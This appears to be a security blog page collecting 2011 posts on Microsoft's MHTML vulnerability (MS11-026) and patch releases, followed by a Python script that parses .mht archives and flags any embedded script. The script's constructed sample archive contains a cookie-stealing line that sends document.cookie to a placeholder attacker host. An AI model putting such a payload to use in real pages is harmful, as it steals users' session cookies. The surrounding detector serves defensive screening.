September 29, 2016

MHTML Problem is Finally Fixed – Microsoft Thanks Google for its Help

Microsoft has kept its promise and delivered a fix for the MHTML problem (MS11-026) that left Windows vulnerable enough that Google stepped in to block web pages that could potentially exploit it. Now that it is fixed, Microsoft has even thanked Google for its help: in the acknowledgement section at the bottom of the Security Bulletin Summary for April 2011, Microsoft thanks Google “for working with us on an issue described in MS11-026”.

However April’s Patch Tuesday isn’t just about the MHTML problem. Microsoft has fixed a titanic 64 vulnerabilities across the following Microsoft products: Microsoft Windows, Microsoft Office, Internet Explorer, Visual Studio, SMB, .NET Framework and GDI+.

Of particular interest is MS11-034 which addresses 30 vulnerabilities that all share the same couple of root causes. Described as “Vulnerabilities in Windows Kernel-Mode Drivers”, these vulnerabilities could allow elevation of privilege if an attacker logged on locally and ran a specially crafted application.

This post also has a video of Jerry Bryant giving further details of the updates in particular MS11-018 (Internet Explorer), MS11-019 (SMB Client) and MS11-020 (SMB Server).

April’s Patch Tuesday To Fix 64 Flaws – MHTML Bug To Be Finally Fixed

Microsoft has published advance notice of April’s Patch Tuesday, which will contain 17 updates (which Microsoft calls “bulletins”) with fixes for a mammoth 64 vulnerabilities across Microsoft Windows, Microsoft Office, Internet Explorer and Microsoft Developer Tools.

Nine of the bulletins are marked as critical and some of the updates will require a system restart. The big question is whether Microsoft will fix the now infamous MHTML bug. Regular readers of Live Hacking will be familiar with the ongoing saga with the MHTML vulnerability in Windows. Discovered in January, Microsoft failed to fix the problem in its February and March security updates and left ALL Windows users (from XP onwards) vulnerable to specially crafted web pages designed to exploit the security hole.

The good news is that, according to a Microsoft Security Response Center blog post, Microsoft will indeed now patch this hole:

We are also planning a fix for the MHTML vulnerability in Windows, rated Important. We alerted people to this issue with Security Advisory 2501696 (including a Fix-It that fully protected customers once downloaded) back in late January. In March, we updated the advisory to let people know we were aware of limited, targeted attacks.

These updates are scheduled for Tuesday April 12, at approximately 10 a.m. PDT. Microsoft’s monthly technical webcast is scheduled for Wednesday, April 13 at 11 a.m. PDT, and the registration can be found here.


Google Notes MHTML Vulnerability Under Active Exploitation

If you are a regular reader of Live Hacking you will be familiar with the ongoing saga with the MHTML vulnerability in Windows. Discovered in January, Microsoft has miserably failed to fix this issue in its February and March security updates and has left ALL Windows users (from XP onwards) vulnerable to specially crafted web pages designed to exploit the security hole.

Google has recently commented on the MHTML vulnerability on its Online Security Blog. In the blog post it confirms what we all feared, that the MHTML bug is now under active exploitation.

There is, however, one more interesting twist to this current wave of attacks: Google notes that these seem to be “highly targeted and apparently politically motivated attacks”.

Google seems to be more proactive than Microsoft at the moment. It mentions in its blog that they “have deployed various server-side defenses to make the MHTML vulnerability harder to exploit.”

Microsoft have issued a Fixit which locks down the MHTML components of Windows which Microsoft, Google and Live Hacking are recommending that Windows users apply as soon as possible.

Microsoft Fail To Patch MHTML Problem

In a shocking move Microsoft’s Patch Tuesday left the now almost famous MHTML bug unfixed. I wrongly predicted earlier this week that Microsoft would fix the MHTML problem during its “update Tuesday”, which occurs on the second Tuesday of the month.

Instead Microsoft patched a critical vulnerability in Windows Media Player/Center and two vulnerabilities rated Important: one in the Windows Remote Desktop client and one in Microsoft Groove.

The critical update resolves two vulnerabilities found in Windows Media Player and Windows Media Center. In the worst case these vulnerabilities could allow remote code execution if a user opens a specially crafted Microsoft Digital Video Recording (.dvr-ms) file.

The fix to the MHTML problem seems now to be as elusive as The Scarlet Pimpernel (they seek him here, they seek him there). The problem was found in January and it affects all versions of Windows from XP upwards regardless of the version of IE installed on the PC.

The vulnerability could allow an attacker to cause a victim to run malicious scripts when visiting a targeted web site, which in turn could result in information disclosure.

Microsoft have issued a Fixit which locks down the MHTML components of Windows, but they have now failed to patch the problem for two consecutive Patch Tuesdays. Will Microsoft fix this in April? Nobody knows!

Microsoft Likely To Fix MHTML Vulnerability Tomorrow

Microsoft’s Patch Tuesday is tomorrow and there are only three fixes listed in Redmond’s advance notification (compared to the 12 bulletins that addressed 22 vulnerabilities in February’s update). Two of the fixes listed are for Windows and one is for Office. One of the fixes listed for Windows is very likely to be a fix to the MHTML problem. Found in January, it affects all versions of Windows from XP upwards regardless of the version of IE installed on the PC.

MHTML (MIME HTML) is a web page archive format (often with the extension .mht) used to combine HTML, images, Flash etc. into a single file. On Windows the MHTML handler is part of Windows and not part of Internet Explorer.

The vulnerability could allow an attacker to cause a victim to run malicious scripts when visiting a targeted web site, which in turn could result in information disclosure.

Previously, Microsoft issued a Fixit which locks down the MHTML components of Windows but they failed to patch the problem on February’s Patch Tuesday.

Also noted in Microsoft’s advance notification is the release of an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

As predicted Microsoft Doesn’t Fix MHTML Problem on Patch Tuesday

Patch Tuesday has been and gone and, as predicted, Microsoft were unable to fix the MHTML vulnerability discovered at the end of January. To be fair to Microsoft, there really wasn’t enough time for testing and proper due process to fix it in time for February’s Patch Tuesday, and Microsoft has issued a Fixit. However, there may now be increased hacker activity to try and exploit this vulnerability and infect unsuspecting web users with malware.

So what did they fix? Microsoft issued 12 bulletins that addressed 22 vulnerabilities in Microsoft Windows, Office, Internet Explorer, and Microsoft’s web server IIS.

Of these 12, three are considered Critical:

MS11-003. This is a Cumulative Security Update for Internet Explorer and addresses problems first described in Security Advisory 2488013. In short, this patch fixes four vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted Web page.

The second critical patch is MS11-006 and only applies to XP and Vista (and Server 2003 and 2008). Windows 7 isn’t affected. The problem fixed here is within the Windows Shell graphics processor. The vulnerability could allow remote code execution if a user views a specially crafted thumbnail image. It was initially described in Security Advisory 2490606 which MS released on January 4th. Since that time, Microsoft report that they have not seen any attacks using this issue.

The last critical patch, MS11-007 addresses vulnerabilities affecting all supported versions of Windows and involving the OpenType Compact Font Driver. The vulnerability could allow remote code execution if a user views content rendered in a specially crafted CFF font.

If you have automatic updating enabled on your Windows machine you will not need to take any action as these updates will be downloaded and installed automatically. If you don’t have automatic updating enabled you will need to check for the updates and install them manually.

In the video below, Jerry Bryant (of Microsoft) discusses this month’s bulletins in further detail:

Will Microsoft Fix the MHTML Problem on Patch Tuesday?

Microsoft has issued advance notice of the bugs it will be squashing next Tuesday. Traditionally Microsoft releases updates to its Windows operating system on the second Tuesday of the month, which is often referred to as “Patch Tuesday”.

In the advance notice Microsoft have announced twelve fixes, which historically is a huge number. January’s Patch Tuesday had just two security updates: one for Windows Backup Manager (only on Vista) and one for WDAC (Windows Data Access Components) across all supported versions of Windows. The key question is whether Microsoft will fix the much publicized MHTML problem, and it looks like the answer is no.

Of the twelve patches only three are marked as critical. The first one is an update for Windows and Internet Explorer and only affects IE 6, 7 and 8. The MHTML problem is present in all supported versions of Windows, irrespective of the version of IE installed. The second update doesn’t apply to Windows 7, so again this can’t be the MHTML problem and the third critical update is actually only critical for Vista and Windows 7, for XP it is marked as important.

So, it looks like patch Tuesday won’t bring a patch for the MHTML problem. That means it will be another month until Microsoft get a fix out the door. Of course, we all understand the need for proper software engineering processes and Microsoft don’t want to rush out a patch which will actually break other things. But, it is no surprise that the day after patch Tuesday is getting to be known as exploit Wednesday and it looks like this coming Wednesday the hackers will be working hard to craft specially formed websites to catch Windows users who haven’t applied the Microsoft Fixit.

Windows Vulnerability with MHTML Forces Microsoft to Issue a Fixit

Microsoft have responded to public reports of a vulnerability in the MHTML protocol handler of Windows. MHTML (MIME HTML) is a web page archive format (often with the extension .mht) used to combine HTML, images, Flash etc. into a single file. On Windows the MHTML handler is part of Windows and not part of Internet Explorer. As such all versions of Windows from XP upwards are affected and the version of IE installed on the PC is irrelevant.

The vulnerability could allow an attacker to cause a victim to run malicious scripts when visiting a targeted web site, which in turn could result in information disclosure.

Microsoft have issued a Fixit which locks down the MHTML components of Windows. They have also issued a test .mht file which shows whether your machine has the Fixit applied or not. Basically the lockdown stops all types of scripts running within .mht files. The published test file does not demonstrate the vulnerability itself.

At this time, Microsoft has not seen any indications of active exploitation of the vulnerability but is recommending that all Windows users apply the Fixit.
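The posts above describe MHTML only in passing: a MIME-based archive that bundles HTML, images and scripts into one .mht file, and a Fixit whose lockdown stops any script inside such files from running. The example below is added here to make that concrete; it is not code from Live Hacking, Microsoft or the Fixit. It parses an .mht archive with Python’s standard email library (an .mht is an ordinary multipart/related MIME message), lists the parts by their Content-Location or cid: reference, and reports every place where the archive would execute script when opened: inline script blocks, inline event handlers, javascript: URLs, and separate script-typed MIME parts. The sample archive, the hostnames example.test and attacker.test, and the part names are all constructed for the demonstration; the check is the kind of screening a defender might run on .mht files arriving by mail or download while waiting for a patch.

```python
"""Parse an MHTML (.mht) archive and flag the script it would execute.

Added example, not code from the original posts or from Microsoft.
An .mht file is a MIME multipart/related message: a root text/html part
plus the images, stylesheets and scripts it references, each addressed by
a Content-Location URL or a Content-ID (cid:) reference.
"""
import email
import re
from email import policy
from email.message import EmailMessage

# Constructed sample archive (hostnames and part names are hypothetical).
SAMPLE_MHT = b"""\
Subject: Constructed sample archive
MIME-Version: 1.0
Content-Type: multipart/related; type="text/html"; boundary="----=_Part_000"

------=_Part_000
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://example.test/index.html

<html><body>
<h1>Archived page</h1>
<img src=3D"cid:logo.gif">
<script>
  location =3D "http://attacker.test/?c=3D" + document.cookie;
</script>
<script src=3D"cid:helper.js"></script>
</body></html>

------=_Part_000
Content-Type: text/javascript
Content-Transfer-Encoding: 7bit
Content-ID: <helper.js>

console.log("loaded from a MIME part");

------=_Part_000
Content-Type: image/gif
Content-Transfer-Encoding: base64
Content-ID: <logo.gif>

R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7

------=_Part_000--
"""

# MIME types that a browser treats as script when referenced from the HTML.
SCRIPT_TYPES = {"text/javascript", "application/javascript",
                "application/x-javascript", "text/vbscript"}
INLINE_SCRIPT = re.compile(r"<script\b", re.IGNORECASE)
EVENT_HANDLER = re.compile(r"\son[a-z]+\s*=", re.IGNORECASE)
JS_URL = re.compile(r"(?:href|src)\s*=\s*[\"']?\s*javascript:", re.IGNORECASE)


def parse_mht(data: bytes) -> EmailMessage:
    """Parse the archive; refuse anything that is not multipart/related."""
    msg = email.message_from_bytes(data, policy=policy.default)
    if msg.get_content_type() != "multipart/related":
        raise ValueError(f"not an MHTML archive: {msg.get_content_type()}")
    return msg


def part_name(part: EmailMessage) -> str:
    """Name a part by its Content-Location URL, else by its cid: reference."""
    if part["Content-Location"]:
        return str(part["Content-Location"])
    cid = str(part["Content-ID"] or "").strip("<>")
    return f"cid:{cid}" if cid else "(unnamed)"


def list_parts(msg: EmailMessage) -> list[tuple[str, str, int]]:
    """Return (name, content type, decoded size in bytes) for each part."""
    out = []
    for part in msg.iter_parts():
        body = part.get_content()  # str for text/*, bytes otherwise
        size = len(body.encode("utf-8")) if isinstance(body, str) else len(body)
        out.append((part_name(part), part.get_content_type(), size))
    return out


def script_indicators(msg: EmailMessage) -> list[str]:
    """List every way the archive would run script when it is opened."""
    findings = []
    for part in msg.iter_parts():
        ctype = part.get_content_type()
        name = part_name(part)
        if ctype in SCRIPT_TYPES:
            findings.append(f"script part: {name} ({ctype})")
            continue
        if ctype != "text/html":
            continue
        html = part.get_content()
        if INLINE_SCRIPT.search(html):
            findings.append(f"<script> in {name}")
        if EVENT_HANDLER.search(html):
            findings.append(f"inline event handler in {name}")
        if JS_URL.search(html):
            findings.append(f"javascript: URL in {name}")
    return findings


if __name__ == "__main__":
    archive = parse_mht(SAMPLE_MHT)
    for name, ctype, size in list_parts(archive):
        print(f"{ctype:24} {size:6d}  {name}")
    for finding in script_indicators(archive):
        print("!", finding)
```

Run against the constructed sample, the listing shows three parts (the HTML root, a JavaScript part and a GIF), and the indicator check reports both the inline script block in the HTML and the separate text/javascript part referenced through cid:. Anything the check reports is exactly what the Fixit’s lockdown prevents from running; an archive that yields no findings is a plain document bundle.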